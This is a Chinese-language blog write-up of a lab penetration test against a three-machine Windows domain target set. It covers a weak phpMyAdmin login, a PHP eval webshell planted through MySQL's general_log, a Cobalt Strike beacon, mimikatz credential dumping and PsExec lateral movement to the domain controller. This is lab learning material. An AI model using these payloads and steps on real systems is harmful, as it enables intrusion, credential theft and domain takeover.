關於部署：https://www.cnblogs.com/Cl0ud/p/13688649.html

PS：好菜，後來發現內網主機還是PING不通VM1，索性三臺主機全部配成NAT模式，按照WEB靶機（VM1）->內網滲透域成員主機（VM2）->拿下域管（VM3）的步驟進行滲透

訪問VM1：http://192.168.221.143/

收集資訊如下：

IP地址：192.168.221.143

主機資訊：Windows NT STU1 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586

伺服器解析引擎：Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45

網站絕對路徑：C:/phpStudy/WWW

被禁用函式：無

同時底部存在MySQL資料庫連線檢測：

輸入預設賬號密碼：root/root

證明弱密碼存在

根據經驗，一般使用phpstudy都會存在phpmyadmin介面，我們可以嘗試爆破目錄進而通過弱密碼控制資料庫

使用dirsearch進行目錄爆破

python3 dirsearch.py -u http://192.168.221.143/ -e *　

如圖：

http://192.168.221.143/phpinfo.php 介面敏感資訊洩露

http://192.168.221.143/phpmyadmin/ phpmyadmin登入介面

root/root 登入

嘗試使用select into outfile寫入一句話木馬

select load_file('C:/phpStudy/WWW/ma.php');
select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/WWW/ma.php';

這裡的網站路徑是之前我們資訊蒐集時找到的

執行成功，但是在目錄下無該檔案

換一種姿勢寫入一句話木馬

參考自：https://xz.aliyun.com/t/3283

其中的利用日誌寫shell

之前的資訊蒐集我們已知伺服器mysql版本>5.0，而mysql5.0以上會建立日誌檔案，可以通過修改日誌的全域性變數getshell

步驟為：

檢測日誌儲存狀態->開啟日誌儲存->修改日誌儲存路徑->使用一句話木馬訪問網址->連線日誌路徑GETSHELL

日誌儲存狀態和日誌儲存路徑需要使用以下命令進行檢視：

general_log 指的是日誌儲存狀態，ON代表開啟，OFF代表關閉

general_log_file 指的是日誌的儲存路徑

SHOW VARIABLES LIKE 'general%'

可以看出 general_log 是關閉的，實際上該全域性變數預設關閉

接著我們開啟日誌儲存，即general_log

set global general_log = "ON";

接著修改日誌儲存路徑（此處路徑依然使用之前資訊蒐集獲得的地址）：

set global general_log_file='C:/phpStudy/WWW/ma.php';

然後就是通過日誌寫入一句話木馬了，SQL查詢：

select '<?php eval($_POST[cmd]);?>';

該查詢流量會記錄在日誌檔案裡，所以我們訪問日誌檔案 ma.php

可以看到存在我們訪問的日誌資訊，看到有Notice，還是去靶機上面看看日誌檔案是否正常寫入

可以看到一句話木馬寫入成功，上菜刀！

可以看到WEB目錄和備份檔案沒有掃描出來，dirsearch的字典還是得自己有空再整理一下，beifen.rar很符合國人的命名習慣hhh

接著通過webshell 反彈 shell

關於CS的安裝：https://www.cnblogs.com/Cl0ud/p/13709669.html

關於CS的簡單使用方法：https://soapffz.com/sec/483.html

為了方便CS後臺執行，進入screen

在screen視窗中執行teamserver服務

使用screen視窗中的快捷鍵 ctrl+ad，令任務後臺執行，現在就可以關閉ssh遠端連線了，執行客戶端CS輸入之前的CS服務端IP和密碼進行登入，賬號隨意，只要與已登入的使用者不重複即可

點選connect進行連線

小春兒加入群聊 has joined，先新建一個Listener，payload選擇beacon http，設定好對應的監聽埠

儲存後生成一個後門，使用剛才建立的監聽器：

生成後在菜刀中上傳該檔案，並且執行之

就可以看到CS主機已上線

右鍵選擇 interact 進入互動模式，將sleep調為0，這樣滲透靶機就能夠直接回顯結果，真實滲透中一般不要直接調為0，容易被流量監測，預設為60秒

冒著電腦被卡死的風險同時開啟三個虛擬機器 :D

資訊蒐集的深度，直接關係到內網滲透測試的成敗

進行本機資訊蒐集：

檢視當前許可權

shell whoami

顯示主機名稱

shell hostname

查詢使用者列表

net user

通過分析分級使用者列表，可以找到內網機器的命名規則，特別是個人機器的名稱，可以用來推測整個域的使用者命名方式

《內網安全攻防》

獲取本地管理員（通常包含域使用者）資訊

net localgroup administrators

使用systeminfo檢視系統詳細資訊

shell systeminfo

補丁資訊如下：

域內主機的補丁通常是批量安裝的，通過檢視本機補丁列表，就可以找到未打補丁的漏洞

作業系統和系統版本為：

查詢程序列表

shell tasklist

常見的防毒軟體的程序為：

獲得了本機的相關資訊之後，就要判斷當前內網中是否存在域

之前在systeminfo中，"域"即為域名，如果"域"為"WORKGROUP"，則表示當前伺服器不在域內：

也可以使用 ipconfig 命令，檢視網路資訊

得知DNS伺服器名稱為 god.org，DNS伺服器往往與域控制器在同一臺伺服器上

檢視域資訊：

shell net view

檢視當前登入域及登入使用者資訊

shell net config workstation

\

"工作站域DNS名稱"為域名，如果為WORKGROUP表示當前為非域環境

"登入域"表示當前登入的使用者是域使用者還是本地使用者

繼續蒐集域內基礎資訊

查詢域

shell net view /domain

查詢 GOD域內全部主機：

shell net view /domain:GOD

同時可以在targets裡面看到掃描出來的主機

提升本機許可權 getsystem

getsystem

獲取憑據，使用 dump hash模組匯出雜湊值（至少具有administrators許可權）

獲取當前計算機中本地使用者的密碼雜湊值

使用logonpasswords模組，呼叫內建在CS中的mimikatz將記憶體中的lsass.exe程序儲存的使用者明文密碼和雜湊匯出

可以看到匯出的憑據資訊：

同時我們之前在橫向探測中已經獲取到了其他targets的資訊，加上現在獲取到的憑證，我們可以嘗試利用獲取到的憑證+PsExec模組登入其他主機

雖然搭建環境的時候沒有搭建成內網的，但是還是建立一個SMB的監聽器：

關於 SMB Beacon

SMB Beacon 使用命名管道通過父級 Beacon 進行通訊，當兩個 Beacons 連結後，子 Beacon 從父 Beacon 獲取到任務併發送。因為連結的 Beacons 使用 Windows 命名管道進行通訊，此流量封裝在 SMB 協議中，所以 SMB Beacon 相對隱蔽，繞防火牆時可能發揮奇效

SMB Beacon有兩種使用方式：

• 直接派生一個孩子，目的為了進一步盜取hash

• 在已有的beacon上建立監聽，用來作為跳板進行內網滲透

這裡我們使用第二種方式，建立SMB監聽：

在彈出的視窗中選擇使用 god.org 的 Administrator 的憑證資訊

監聽器選擇剛才建立的 smb beacon，會話也選擇對應的 smb beacon 的會話：

點選launch之後等待一會，就可以獲取到域控主機OWA的beacon

在域控主機上繼續匯出憑據，可以獲得整個域內使用者的密碼雜湊值

hashdump+logonpasswords

檢視已經獲取到的憑據

同樣的方法獲取到ROOT-TVI862UBEH主機的許可權

現在的樞紐結構為：

能夠使用 psexec 能迅速地獲得域控主機的 beacon 是因為在本機中讀取到了域管理員賬號密碼的 hash

接下來在派生的STU1主機上嘗試使用token竊取

選擇 GOD\Administrator 的 token 盜取：

點選後token會儲存在當前會話中

嘗試登入ROOT主機

在令牌處勾選當前token

不知道為啥失敗了 嗚嗚嗚

等內網滲透熟練了再來複更，暫時就先做到這裡趴。

關於CS和MSF的聯動會在紅日安全靶機2中進行練習

參考連結：

https://soapffz.com/sec/558.html

https://v0w.top/2020/07/19/vulnstack1/

https://www.freebuf.com/column/231111.html